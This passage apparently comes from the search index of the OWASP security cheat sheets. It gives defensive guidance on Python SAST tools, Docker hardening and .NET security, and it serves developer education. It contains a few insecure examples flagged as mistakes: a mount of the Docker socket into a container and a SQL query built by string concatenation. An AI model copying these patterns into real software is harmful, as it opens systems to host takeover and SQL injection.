"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#sast-tools","title":"SAST Tools","text":"

There are several excellent open-source static analysis security tools for Python that are worth considering, including:

Bandit \u2013 Bandit is a tool designed to find common security issues in Python. To do this Bandit processes each file, builds an Abstract Syntax Tree (AST) from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report. Bandit was originally developed within the OpenStack Security Project and later rehomed to PyCQA.

Semgrep \u2013 Semgrep is a fast, open-source static analysis engine for finding bugs, detecting vulnerabilities in third-party dependencies, and enforcing code standards. It is developed by \"Return To Corporation\" (usually referred to as r2c) and open-source contributors. It works based on rules, which can focus on security, language best practices, or something else. Creating a rule is easy and Semgrep is very powerful. For Django there are 29 rules.

PyCharm Security \u2013 Pycharm-security is a plugin for PyCharm, or JetBrains IDEs with the Python plugin. The plugin looks at Python code for common security vulnerabilities and suggests fixes. It can also be executed from a Docker container. It has about 40 checks and some are Django specific.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#related-articles-and-references","title":"Related Articles and References","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html","title":"Docker Security Cheat Sheet","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Docker is the most popular containerization technology. When used properly, it can increase the level of security (in comparison to running applications directly on the host). On the other hand, some misconfigurations can downgrade the level of security or even introduce new vulnerabilities.

The aim of this cheat sheet is to provide an easy to use list of common security mistakes and good practices that will help you secure your Docker containers.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rules","title":"Rules","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-0-keep-host-and-docker-up-to-date","title":"RULE #0 - Keep Host and Docker up to date","text":"

To prevent known container escape vulnerabilities, which typically result in escalation to root/administrator privileges, patching Docker Engine and Docker Machine is crucial.

In addition, containers (unlike virtual machines) share the kernel with the host; therefore, kernel exploits executed inside a container will directly hit the host kernel. For example, a kernel privilege escalation exploit (like Dirty COW) executed inside a well-insulated container will still result in root access on the host.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-1-do-not-expose-the-docker-daemon-socket-even-to-the-containers","title":"RULE #1 - Do not expose the Docker daemon socket (even to the containers)","text":"

Docker socket /var/run/docker.sock is the UNIX socket that Docker is listening to. This is the primary entry point for the Docker API. The owner of this socket is root. Giving someone access to it is equivalent to giving unrestricted root access to your host.

Do not enable the TCP Docker daemon socket. If you are running the Docker daemon with -H tcp://0.0.0.0:XXX or similar, you are exposing unencrypted and unauthenticated direct access to the Docker daemon; if the host is connected to the internet, this means the Docker daemon on your computer can be used by anyone on the public internet. If you really, really have to do this, you should secure it. Check how to do this following the Docker official documentation.

Do not expose /var/run/docker.sock to other containers. If you are running your docker image with -v /var/run/docker.sock:/var/run/docker.sock or similar, you should change it. Remember that mounting the socket read-only is not a solution; it only makes it harder to exploit. The equivalent in a docker-compose file is something like this:

volumes:\n- \"/var/run/docker.sock:/var/run/docker.sock\"\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-2-set-a-user","title":"RULE #2 - Set a user","text":"

Configuring the container to use an unprivileged user is the best way to prevent privilege escalation attacks. This can be accomplished in three different ways as follows:

  1. During runtime using -u option of docker run command e.g.:

    docker run -u 4000 alpine\n
  2. During build time. Simply add a user in the Dockerfile and use it. For example:

    FROM alpine\nRUN groupadd -r myuser && useradd -r -g myuser myuser\n<HERE DO WHAT YOU HAVE TO DO AS A ROOT USER LIKE INSTALLING PACKAGES ETC.>\nUSER myuser\n
  3. Enable user namespace support (--userns-remap=default) in Docker daemon

More information about this topic can be found at Docker official documentation

In Kubernetes, this can be configured in the Security Context using the runAsNonRoot field, e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nrunAsNonRoot: true\n...\n

As a Kubernetes cluster administrator, you can configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-3-limit-capabilities-grant-only-specific-capabilities-needed-by-a-container","title":"RULE #3 - Limit capabilities (Grant only specific capabilities, needed by a container)","text":"

Linux kernel capabilities are a set of privileges that can be used by privileged processes. Docker, by default, runs with only a subset of capabilities. You can change this and drop some capabilities (using --cap-drop) to harden your Docker containers, or add some capabilities (using --cap-add) if needed. Remember not to run containers with the --privileged flag - this will add ALL Linux kernel capabilities to the container.

The most secure setup is to drop all capabilities --cap-drop all and then add only required ones. For example:

docker run --cap-drop all --cap-add CHOWN alpine\n

And remember: Do not run containers with the --privileged flag!!!

In Kubernetes, this can be configured in the Security Context using the capabilities field, e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\ncapabilities:\ndrop:\n- all\nadd:\n- CHOWN\n...\n

As a Kubernetes cluster administrator, you can configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag","title":"RULE #4 - Add \u2013no-new-privileges flag","text":"

Always run your Docker images with --security-opt=no-new-privileges in order to prevent privilege escalation using setuid or setgid binaries.

In Kubernetes, this can be configured in the Security Context using the allowPrivilegeEscalation field, e.g.:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nallowPrivilegeEscalation: false\n...\n

As a Kubernetes cluster administrator, you can refer to Kubernetes documentation to configure it using Pod Security Policies.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-5-disable-inter-container-communication-iccfalse","title":"RULE #5 - Disable inter-container communication (--icc=false)","text":"

By default, inter-container communication (icc) is enabled, which means that all containers can talk to each other (using the docker0 bridged network). This can be disabled by running the Docker daemon with the --icc=false flag. If icc is disabled (icc=false), it is required to specify which containers can communicate using the --link=CONTAINER_NAME_or_ID:ALIAS option. See more in the Docker documentation on container communication.

In Kubernetes, Network Policies can be used for this.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-6-use-linux-security-module-seccomp-apparmor-or-selinux","title":"RULE #6 - Use Linux Security Module (seccomp, AppArmor, or SELinux)","text":"

First of all, do not disable the default security profile!

Consider using a security profile like seccomp or AppArmor.

Instructions on how to do this inside Kubernetes can be found in the Security Context documentation and in the Kubernetes API documentation.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-7-limit-resources-memory-cpu-file-descriptors-processes-restarts","title":"RULE #7 - Limit resources (memory, CPU, file descriptors, processes, restarts)","text":"

The best way to avoid DoS attacks is by limiting resources. You can limit memory, CPU, maximum number of restarts (--restart=on-failure:<number_of_restarts>), maximum number of file descriptors (--ulimit nofile=<number>) and maximum number of processes (--ulimit nproc=<number>).

Check documentation for more details about ulimits

You can also do this inside Kubernetes: Assign Memory Resources to Containers and Pods, Assign CPU Resources to Containers and Pods and Assign Extended Resources to a Container

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-8-set-filesystem-and-volumes-to-read-only","title":"RULE #8 - Set filesystem and volumes to read-only","text":"

Run containers with a read-only filesystem using --read-only flag. For example:

docker run --read-only alpine sh -c 'echo \"whatever\" > /tmp'\n

If an application inside a container has to save something temporarily, combine --read-only flag with --tmpfs like this:

docker run --read-only --tmpfs /tmp alpine sh -c 'echo \"whatever\" > /tmp/file'\n

Equivalent in the docker-compose file will be:

version: \"3\"\nservices:\nalpine:\nimage: alpine\nread_only: true\n

Equivalent in kubernetes in Security Context will be:

kind: ...\napiVersion: ...\nmetadata:\nname: ...\nspec:\n...\ncontainers:\n- name: ...\nimage: ....\nsecurityContext:\n...\nreadOnlyRootFilesystem: true\n...\n

In addition, if a volume is mounted only for reading, mount it as read-only. This can be done by appending :ro to the -v option, like this:

docker run -v volume-name:/path/in/container:ro alpine\n

Or by using --mount option:

docker run --mount source=volume-name,destination=/path/in/container,readonly alpine\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-9-use-static-analysis-tools","title":"RULE #9 - Use static analysis tools","text":"

To detect containers with known vulnerabilities, scan images using static analysis tools.

To detect secrets in images:

To detect misconfigurations in Kubernetes:

To detect misconfigurations in Docker:

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-10-set-the-logging-level-to-at-least-info","title":"RULE #10 - Set the logging level to at least INFO","text":"

By default, the Docker daemon is configured to have a base logging level of 'info', and if this is not the case: set the Docker daemon log level to 'info'. Rationale: Setting up an appropriate log level, configures the Docker daemon to log events that you would want to review later. A base log level of 'info' and above would capture all logs except the debug logs. Until and unless required, you should not run docker daemon at the 'debug' log level.

To configure the log level in docker-compose:

docker-compose --log-level info up\n
"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-11-lint-the-dockerfile-at-build-time","title":"Rule #11 - Lint the Dockerfile at build time","text":"

Many issues can be prevented by following some best practices when writing the Dockerfile. Adding a security linter as a step in the build pipeline can go a long way in avoiding further headaches. Some issues that are worth checking are:

References:

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-12-run-docker-in-root-less-mode","title":"Rule #12 - Run Docker in root-less mode","text":"

Rootless mode ensures that the Docker daemon and containers are running as an unprivileged user, which means that even if an attacker breaks out of the container, they will not have root privileges on the host, which in turn substantially limits the attack surface.

Rootless mode graduated from experimental in Docker Engine v20.10 and should be considered for added security, provided the known limitations are not an impediment.

Rootless mode allows running the Docker daemon and containers as a non-root user to mitigate potential vulnerabilities in the daemon and the container runtime. Rootless mode does not require root privileges even during the installation of the Docker daemon, as long as the prerequisites are met. It was introduced in Docker Engine v19.03 as an experimental feature.

Read more about rootless mode and its limitations, installation and usage instructions on Docker documentation page.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#related-projects","title":"Related Projects","text":"

OWASP Docker Top 10

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html","title":"DotNet Security Cheat Sheet","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This page intends to provide quick basic .NET security tips for developers.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#the-net-framework","title":"The .NET Framework","text":"

The .NET Framework is Microsoft's principal platform for enterprise development. It is the supporting API for ASP.NET, Windows Desktop applications, Windows Communication Foundation services, SharePoint, Visual Studio Tools for Office and other technologies.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#updating-the-framework","title":"Updating the Framework","text":"

The .NET Framework is kept up-to-date by Microsoft with the Windows Update service. Developers do not normally need to run separate updates to the Framework. Windows Update can be accessed at Windows Update or from the Windows Update program on a Windows computer.

Individual frameworks can be kept up to date using NuGet. As Visual Studio prompts for updates, build it into your lifecycle.

Remember that third-party libraries have to be updated separately and not all of them use NuGet. ELMAH for instance, requires a separate update effort.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#security-announcements","title":"Security Announcements","text":"

Receive security notifications by selecting the \"Watch\" button at the following repositories:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#net-framework-guidance","title":".NET Framework Guidance","text":"

The .NET Framework is the set of APIs that support an advanced type system, data, graphics, network, file handling and most of the rest of what is needed to write enterprise apps in the Microsoft ecosystem. It is a nearly ubiquitous library that is strongly named and versioned at the assembly level.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#data-access","title":"Data Access","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#cryptography","title":"Cryptography","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#general-cryptography-guidance","title":"General cryptography guidance","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#encryption-for-storage","title":"Encryption for storage","text":"

The following code snippet shows an example of using AES-GCM to perform encryption/decryption of data. It is strongly recommended to have a cryptography expert review your final design and code, as even the most trivial error can severely weaken your encryption.

The code is based on example from here: https://www.scottbrady91.com/c-sharp/aes-gcm-dotnet

A few constraints/pitfalls with this code:

Click here to view the \"AES-GCM symmetric encryption\" code snippet.
// Code based on example from here:\n// https://www.scottbrady91.com/c-sharp/aes-gcm-dotnet\n\npublic class AesGcmSimpleTest\n{\npublic static void Main()\n{\n\n// Key of 32 bytes / 256 bits for AES\nvar key = new byte[32];\nRandomNumberGenerator.Fill(key);\n\n// MaxSize = 12 bytes / 96 bits and this size should always be used.\nvar nonce = new byte[AesGcm.NonceByteSizes.MaxSize];\nRandomNumberGenerator.Fill(nonce);\n\n// Tag for authenticated encryption\nvar tag = new byte[AesGcm.TagByteSizes.MaxSize];\n\nvar message = \"This message to be encrypted\";\nConsole.WriteLine(message);\n\n// Encrypt the message\nvar cipherText = AesGcmSimple.Encrypt(message, nonce, out tag, key);\nConsole.WriteLine(Convert.ToBase64String(cipherText));\n\n// Decrypt the message\nvar message2 = AesGcmSimple.Decrypt(cipherText, nonce, tag, key);\nConsole.WriteLine(message2);\n\n\n}\n}\n\n\npublic static class AesGcmSimple\n{\n\npublic static byte[] Encrypt(string plaintext, byte[] nonce, out byte[] tag, byte[] key)\n{\nusing(var aes = new AesGcm(key))\n{\n// Tag for authenticated encryption\ntag = new byte[AesGcm.TagByteSizes.MaxSize];\n\n// Create a byte array from the message to encrypt\nvar plaintextBytes = Encoding.UTF8.GetBytes(plaintext);\n\n// Ciphertext will be same length in bytes as plaintext \nvar ciphertext = new byte[plaintextBytes.Length];\n\n// perform the actual encryption\naes.Encrypt(nonce, plaintextBytes, ciphertext, tag);\nreturn ciphertext;\n}\n}\n\npublic static string Decrypt(byte[] ciphertext, byte[] nonce, byte[] tag, byte[] key)\n{\nusing(var aes = new AesGcm(key))\n{\n// Plaintext will be same length in bytes as Ciphertext \nvar plaintextBytes = new byte[ciphertext.Length];\n\n// perform the actual decryption\naes.Decrypt(nonce, ciphertext, tag, plaintextBytes);\n\nreturn Encoding.UTF8.GetString(plaintextBytes);\n}\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#encryption-for-transmission","title":"Encryption for transmission","text":"

The following code snippet shows an example of using Elliptic Curve Diffie-Hellman (ECDH) together with AES-GCM to perform encryption/decryption of data between two different sides without the need to transfer the symmetric key between the two sides. Instead, the sides exchange public keys and can then use ECDH to generate a shared secret which can be used for the symmetric encryption.

Again, it is strongly recommended to have a cryptography expert review your final design and code, as even the most trivial error can severely weaken your encryption.

Note that this code sample relies on the AesGcmSimple class from the previous section.

A few constraints/pitfalls with this code:

Click here to view the \"ECDH asymmetric encryption\" code snippet.
public class ECDHSimpleTest\n{\npublic static void Main()\n{\n// Generate ECC key pair for Alice\nvar alice = new ECDHSimple();\nbyte[] alicePublicKey = alice.PublicKey;\n\n// Generate ECC key pair for Bob\nvar bob = new ECDHSimple();\nbyte[] bobPublicKey = bob.PublicKey;\n\nstring plaintext = \"Hello, Bob! How are you?\";\nConsole.WriteLine(\"Secret being sent from Alice to Bob: \" + plaintext);\n\n// Note that a new nonce is generated with every encryption operation in line with\n// in line with the AES GCM security \nbyte[] tag;\nbyte[] nonce;\nvar cipherText = alice.Encrypt(bobPublicKey, plaintext, out nonce, out tag);\nConsole.WriteLine(\"Ciphertext, nonce, and tag being sent from Alice to Bob: \" + Convert.ToBase64String(cipherText) + \" \" + Convert.ToBase64String(nonce) + \" \" + Convert.ToBase64String(tag));\n\nvar decrypted = bob.Decrypt(alicePublicKey, cipherText, nonce, tag);\nConsole.WriteLine(\"Secret received by Bob from Alice: \" + decrypted);\n\nConsole.WriteLine();\n\nstring plaintext2 = \"Hello, Alice! I'm good, how are you?\";\nConsole.WriteLine(\"Secret being sent from Bob to Alice: \" + plaintext2);\n\nbyte[] tag2;\nbyte[] nonce2;\nvar cipherText2 = bob.Encrypt(alicePublicKey, plaintext2, out nonce2, out tag2);\nConsole.WriteLine(\"Ciphertext, nonce, and tag being sent from Bob to Alice: \" + Convert.ToBase64String(cipherText2) + \" \" + Convert.ToBase64String(nonce2) + \" \" + Convert.ToBase64String(tag2));\n\nvar decrypted2 = alice.Decrypt(bobPublicKey, cipherText2, nonce2, tag2);\nConsole.WriteLine(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n}\n\n\npublic class ECDHSimple\n{\n\nprivate ECDiffieHellmanCng ecdh = new ECDiffieHellmanCng();\n\npublic byte[] PublicKey\n{\nget\n{\nreturn ecdh.PublicKey.ToByteArray();\n}\n}\n\npublic byte[] Encrypt(byte[] partnerPublicKey, string message, out byte[] nonce, out byte[] tag)\n{\n// Generate the AES Key and Nonce\nvar aesKey = GenerateAESKey(partnerPublicKey);\n\n// Tag for authenticated encryption\ntag = new byte[AesGcm.TagByteSizes.MaxSize];\n\n// MaxSize = 12 bytes / 96 bits and this size should always be used.\n// A new nonce is generated with every encryption operation in line with\n// the AES GCM security model\nnonce = new byte[AesGcm.NonceByteSizes.MaxSize];\nRandomNumberGenerator.Fill(nonce);\n\n// return the encrypted value\nreturn AesGcmSimple.Encrypt(message, nonce, out tag, aesKey);\n}\n\n\npublic string Decrypt(byte[] partnerPublicKey, byte[] ciphertext, byte[] nonce, byte[] tag)\n{\n// Generate the AES Key and Nonce\nvar aesKey = GenerateAESKey(partnerPublicKey);\n\n// return the decrypted value\nreturn AesGcmSimple.Decrypt(ciphertext, nonce, tag, aesKey);\n}\n\nprivate byte[] GenerateAESKey(byte[] partnerPublicKey)\n{\n// Derive the secret based on this side's private key and the other side's public key \nbyte[] secret = ecdh.DeriveKeyMaterial(CngKey.Import(partnerPublicKey, CngKeyBlobFormat.EccPublicBlob));\n\nbyte[] aesKey = new byte[32]; // 256-bit AES key\nArray.Copy(secret, 0, aesKey, 0, 32); // Copy first 32 bytes as the key\n\nreturn aesKey;\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#hashing","title":"Hashing","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#general","title":"General","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance","title":"ASP NET Web Forms Guidance","text":"

ASP.NET Web Forms is the original browser-based application development API for the .NET framework, and is still the most common enterprise platform for web application development.

protected override void OnInit(EventArgs e) {\nbase.OnInit(e);\nViewStateUserKey = Session.SessionID;\n}\n

If you don't use Viewstate, then look to the default master page of the ASP.NET Web Forms default template for a manual anti-CSRF token using a double-submit cookie.

private\u00a0const\u00a0string\u00a0AntiXsrfTokenKey\u00a0=\u00a0\"__AntiXsrfToken\";\nprivate\u00a0const\u00a0string\u00a0AntiXsrfUserNameKey\u00a0=\u00a0\"__AntiXsrfUserName\";\nprivate\u00a0string\u00a0_antiXsrfTokenValue;\nprotected\u00a0void\u00a0Page_Init(object\u00a0sender,\u00a0EventArgs\u00a0e)\n{\n//\u00a0The\u00a0code\u00a0below\u00a0helps\u00a0to\u00a0protect\u00a0against\u00a0XSRF\u00a0attacks\nvar\u00a0requestCookie\u00a0=\u00a0Request.Cookies[AntiXsrfTokenKey];\nGuid\u00a0requestCookieGuidValue;\nif\u00a0(requestCookie\u00a0!=\u00a0null\u00a0&&\u00a0Guid.TryParse(requestCookie.Value,\u00a0out\u00a0requestCookieGuidValue))\n{\n//\u00a0Use\u00a0the\u00a0Anti-XSRF\u00a0token\u00a0from\u00a0the\u00a0cookie\n_antiXsrfTokenValue\u00a0=\u00a0requestCookie.Value;\nPage.ViewStateUserKey\u00a0=\u00a0_antiXsrfTokenValue;\n}\nelse\n{\n//\u00a0Generate\u00a0a\u00a0new\u00a0Anti-XSRF\u00a0token\u00a0and\u00a0save\u00a0to\u00a0the\u00a0cookie\n_antiXsrfTokenValue\u00a0=\u00a0Guid.NewGuid().ToString(\"N\");\nPage.ViewStateUserKey\u00a0=\u00a0_antiXsrfTokenValue;\nvar\u00a0responseCookie\u00a0=\u00a0new\u00a0HttpCookie(AntiXsrfTokenKey)\n{\nHttpOnly\u00a0=\u00a0true,\nValue\u00a0=\u00a0_antiXsrfTokenValue\n};\nif\u00a0(FormsAuthentication.RequireSSL\u00a0&&\u00a0Request.IsSecureConnection)\n{\nresponseCookie.Secure\u00a0=\u00a0true;\n}\nResponse.Cookies.Set(responseCookie);\n}\nPage.PreLoad\u00a0+=\u00a0master_Page_PreLoad;\n}\nprotected\u00a0void\u00a0master_Page_PreLoad(object\u00a0sender,\u00a0EventArgs\u00a0e)\n{\nif\u00a0(!IsPostBack)\n{\n//\u00a0Set\u00a0Anti-XSRF\u00a0token\nViewState[AntiXsrfTokenKey]\u00a0=\u00a0Page.ViewStateUserKey;\nViewState[AntiXsrfUserNameKey]\u00a0=\u00a0Context.User.Identity.Name\u00a0??\u00a0String.Empty;\n}\nelse\n{\n//\u00a0Validate\u00a0the\u00a0Anti-XSRF\u00a0token\nif ((string)ViewState[AntiXsrfTokenKey] != _antiXsrfTokenValue ||\n(string)ViewState[AntiXsrfUserNameKey]\u00a0!=\u00a0(Context.User.Identity.Name\u00a0??\u00a0String.Empty))\n{\nthrow\u00a0new\u00a0InvalidOperationException(\"Validation\u00a0of\u00a0Anti-XSRF\u00a0token\u00a0failed.\");\n}\n}\n}\n
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n<system.web>\n<httpRuntime enableVersionHeader=\"false\"/>\n</system.web>\n<system.webServer>\n<security>\n<requestFiltering removeServerHeader=\"true\" />\n</security>\n<staticContent>\n<clientCache cacheControlCustom=\"public\"\ncacheControlMode=\"UseMaxAge\"\ncacheControlMaxAge=\"1.00:00:00\"\nsetEtag=\"true\" />\n</staticContent>\n<httpProtocol>\n<customHeaders>\n<add name=\"Content-Security-Policy\"\nvalue=\"default-src 'none'; style-src 'self'; img-src 'self'; font-src 'self'\" />\n<add name=\"X-Content-Type-Options\" value=\"NOSNIFF\" />\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n<add name=\"X-Permitted-Cross-Domain-Policies\" value=\"master-only\"/>\n<add name=\"X-XSS-Protection\" value=\"0\"/>\n<remove name=\"X-Powered-By\"/>\n</customHeaders>\n</httpProtocol>\n<rewrite>\n<rules>\n<rule name=\"Redirect to https\">\n<match url=\"(.*)\"/>\n<conditions>\n<add input=\"{HTTPS}\" pattern=\"Off\"/>\n<add input=\"{REQUEST_METHOD}\" pattern=\"^get$|^head$\" />\n</conditions>\n<action type=\"Redirect\" url=\"https://{HTTP_HOST}/{R:1}\" redirectType=\"Permanent\"/>\n</rule>\n</rules>\n<outboundRules>\n<rule name=\"Add HSTS Header\" enabled=\"true\">\n<match serverVariable=\"RESPONSE_Strict_Transport_Security\" pattern=\".*\" />\n<conditions>\n<add input=\"{HTTPS}\" pattern=\"on\" ignoreCase=\"true\" />\n</conditions>\n<action type=\"Rewrite\" value=\"max-age=15768000\" />\n</rule>\n</outboundRules>\n</rewrite>\n</system.webServer>\n</configuration>\n
<httpRuntime enableVersionHeader=\"false\" />\n
HttpContext.Current.Response.Headers.Remove(\"Server\");\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#http-validation-and-encoding","title":"HTTP validation and encoding","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#forms-authentication","title":"Forms authentication","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-mvc-guidance","title":"ASP NET MVC Guidance","text":"

ASP.NET MVC (Model\u2013View\u2013Controller) is a contemporary web application framework that uses more standardized HTTP communication than the Web Forms postback model.

The OWASP Top 10 2017 lists the most prevalent and dangerous threats to web security in the world today and is reviewed every 3 years.

This section is based on this. Your approach to securing your web application should be to start at the top threat (A1 below) and work down; this will ensure that any time spent on security is spent most effectively, covering the top threats first and lesser threats afterwards. After covering the Top 10 it is generally advisable to assess for other threats or get a professionally completed penetration test.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a1-injection","title":"A1 Injection","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

DO: Using an object relational mapper (ORM) or stored procedures is the most effective way of countering the SQL Injection vulnerability.

DO: Use parameterized queries where a direct SQL query must be used. More information can be found here.

e.g. in Entity Framework:

var\u00a0sql\u00a0=\u00a0@\"Update\u00a0[User]\u00a0SET\u00a0FirstName\u00a0=\u00a0@FirstName\u00a0WHERE\u00a0Id\u00a0=\u00a0@Id\";\ncontext.Database.ExecuteSqlCommand(\nsql,\nnew\u00a0SqlParameter(\"@FirstName\",\u00a0firstname),\nnew\u00a0SqlParameter(\"@Id\",\u00a0id));\n

DO NOT: Concatenate strings anywhere in your code and execute them against your database (known as dynamic SQL).

NB: You can still accidentally do this with ORMs or stored procedures, so check everywhere.

e.g.

string\u00a0strQry\u00a0=\u00a0\"SELECT\u00a0*\u00a0FROM\u00a0Users\u00a0WHERE\u00a0UserName='\"\u00a0+\u00a0txtUser.Text\u00a0+\u00a0\"'\u00a0AND\u00a0Password='\"\n+\u00a0txtPassword.Text\u00a0+\u00a0\"'\";\nEXEC\u00a0strQry\u00a0//\u00a0SQL\u00a0Injection\u00a0vulnerability!\n

DO: Practice least privilege - connect to the database using an account with the minimum set of permissions required to do its job, i.e. not the sa account.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#os-injection","title":"OS Injection","text":"

General guidance about OS Injection can be found on this cheat sheet.

DO: Use System.Diagnostics.Process.Start to call underlying OS functions.

e.g.

var process = new System.Diagnostics.Process();\nvar startInfo = new System.Diagnostics.ProcessStartInfo();\nstartInfo.FileName = \"validatedCommand\";\nstartInfo.Arguments = \"validatedArg1 validatedArg2 validatedArg3\";\nprocess.StartInfo = startInfo;\nprocess.Start();\n

DO NOT: Assume that this mechanism will protect against malicious input designed to break out of one argument and then tamper with another argument to the process. This will still be possible.

DO: Use allow-list validation on all user supplied input wherever possible. Input validation prevents improperly formed data from entering an information system. For more information please see the Input Validation Cheat Sheet.

e.g. validating user input using the IPAddress.TryParse method:

//User input\nstring ipAddress = \"127.0.0.1\";\n\n//check to make sure an ip address was provided\nif (!string.IsNullOrEmpty(ipAddress))\n{\n// Create an instance of IPAddress for the specified address string (in\n// dotted-quad, or colon-hexadecimal notation).\nif (IPAddress.TryParse(ipAddress, out var address))\n{\n// Display the address in standard notation.\nreturn address.ToString();\n}\nelse\n{\n//ipAddress is not of type IPAddress\n...\n}\n...\n}\n

DO: Try to accept only simple alphanumeric characters.
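
As a rough illustration only, an allow-list check for simple alphanumeric input might look like the following sketch; the helper name, the pattern and the length limit are assumptions to adapt to your own requirements.

using System.Text.RegularExpressions;\n\n// Illustrative allow-list check: accept only simple alphanumeric input of a bounded length\n// (the pattern and the 64 character limit are assumptions, adjust to your requirements)\npublic static class InputAllowList\n{\nprivate static readonly Regex Alphanumeric = new Regex(\"^[a-zA-Z0-9]{1,64}$\", RegexOptions.Compiled);\n\npublic static bool IsSafe(string input)\n{\nreturn !string.IsNullOrEmpty(input) && Alphanumeric.IsMatch(input);\n}\n}\n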

DO NOT: Assume you can sanitize special characters without actually removing them. Various combinations of \\, ' and @ may have an unexpected impact on sanitization attempts.

DO NOT: Rely on methods without a security guarantee.

e.g. .NET Core 2.2 and greater and .NET 5 and greater support ProcessStartInfo.ArgumentList which performs some character escaping but the object includes a disclaimer that it is not safe with untrusted input.

DO: Look at alternatives to passing raw untrusted arguments via command-line parameters such as encoding using Base64 (which would safely encode any special characters as well) and then decode the parameters in the receiving application.
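
As a hedged sketch of this approach, the untrusted value can be Base64 encoded before it is passed as an argument and decoded again in the receiving application; the application name below is a placeholder.

using System;\nusing System.Text;\n\n// Illustrative sketch: Base64 encode the untrusted value before passing it as an argument\nstring untrustedInput = \"some user supplied value\";\nstring encodedArg = Convert.ToBase64String(Encoding.UTF8.GetBytes(untrustedInput));\n\nvar startInfo = new System.Diagnostics.ProcessStartInfo();\nstartInfo.FileName = \"receivingApp\"; // placeholder for your own application\nstartInfo.Arguments = encodedArg;\n\n// In the receiving application, decode the argument back to the original value before use\nstring decoded = Encoding.UTF8.GetString(Convert.FromBase64String(encodedArg));\n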

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#ldap-injection","title":"LDAP injection","text":"

Almost any character can be used in Distinguished Names. However, some must be escaped with the backslash \\ escape character. A table showing which characters should be escaped for Active Directory can be found in the LDAP Injection Prevention Cheat Sheet.

NB: The space character must be escaped only if it is the leading or trailing character in a component name, such as a Common Name. Embedded spaces should not be escaped.

More information can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a2-broken-authentication","title":"A2 Broken Authentication","text":"

DO: Use ASP.NET Core Identity. The ASP.NET Core Identity framework is well configured by default: it uses the PBKDF2 hashing function for passwords and generates a random salt per user.

DO: Set a secure password policy.

e.g. ASP.NET Core Identity:

//startup.cs\nservices.Configure<IdentityOptions>(options =>\n{\n// Password settings\noptions.Password.RequireDigit = true;\noptions.Password.RequiredLength = 8;\noptions.Password.RequireNonAlphanumeric = true;\noptions.Password.RequireUppercase = true;\noptions.Password.RequireLowercase = true;\noptions.Password.RequiredUniqueChars = 6;\n\n\noptions.Lockout.DefaultLockoutTimeSpan = TimeSpan.FromMinutes(30);\noptions.Lockout.MaxFailedAccessAttempts = 3;\n\noptions.SignIn.RequireConfirmedEmail = true;\n\noptions.User.RequireUniqueEmail = true;\n});\n

DO: Set a cookie policy.

e.g.

//startup.cs\nservices.ConfigureApplicationCookie(options =>\n{\noptions.Cookie.HttpOnly = true;\noptions.Cookie.Expiration = TimeSpan.FromHours(1);\noptions.SlidingExpiration = true;\n});\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a3-sensitive-data-exposure","title":"A3 Sensitive Data Exposure","text":"

DO NOT: Store encrypted passwords.

DO: Use a strong hash to store password credentials. For hashing, refer to this section.
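
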